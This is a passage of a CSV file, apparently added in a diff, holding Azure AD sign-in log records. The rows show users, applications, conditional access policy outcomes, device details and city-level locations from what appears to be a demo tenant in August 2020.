'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",92c2001d-49e6-496a-951e-7f191b920700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,92c2001d-49e6-496a-951e-7f191b920700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1646,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:35.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c2c524fe-3829-4e2f-85cf-90c0ff9b9747,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",011e8186-a783-421c-9de9-872062630600,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,011e8186-a783-421c-9de9-872062630600,SigninLogs,Sucess,-20.54751015,-47.4056282
+1647,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:02.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b6597a7e-d75e-48dd-bd43-db6abaea4624,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",cbcd7f19-25f4-4cfd-824c-94dc62040600,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,cbcd7f19-25f4-4cfd-824c-94dc62040600,SigninLogs,Sucess,-20.54751015,-47.4056282
+1648,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:50.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6a458475-1b46-4605-a400-c7a920460895,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office Delve,94c63fef-13a3-47bc-8074-75af8c65887a,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 32, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",3a4d127f-5a89-4252-9f54-d79d7fdd0700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3a4d127f-5a89-4252-9f54-d79d7fdd0700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1649,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:56.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d3aeb641-0896-4ec6-88a4-5da507f5648c,Microsoft.aadiam,Microsoft.aadiam,,Hagar Romach,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",d47bd47d-d635-40c8-a3b8-94af18a52400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.12094116210936, 'latitude': 47.68050003051758}, 'state': 'Washington', 'city': 'Redmond'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Hagar Romach,110d36ce-95b9-4ce4-a5cd-f79bbe4bbd9f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,d47bd47d-d635-40c8-a3b8-94af18a52400,SigninLogs,Sucess,47.68050003,-122.1209412
+1650,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:05.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",d774c493-40b1-4743-b785-3f4a6ce10000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,d774c493-40b1-4743-b785-3f4a6ce10000,SigninLogs,Sucess,33.0175209,35.44601059
+1651,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:53.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7b3398b7-9372-4314-b7a6-25b47117d065,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4445394f-bc55-4988-8502-680daad30000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4445394f-bc55-4988-8502-680daad30000,SigninLogs,Sucess,36.6404686,-78.26995087
+1652,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:58.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a77e43f3-4791-4633-b109-e546ada5db8f,Microsoft.aadiam,Microsoft.aadiam,,Hagar Romach,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",87802367-3de7-42c2-ada0-d6bcc08e0000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.12094116210936, 'latitude': 47.68050003051758}, 'state': 'Washington', 'city': 'Redmond'}",none,none,none,none,[],{'errorCode': 0},Hagar Romach,110d36ce-95b9-4ce4-a5cd-f79bbe4bbd9f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,87802367-3de7-42c2-ada0-d6bcc08e0000,SigninLogs,Sucess,47.68050003,-122.1209412
+1653,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:31.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 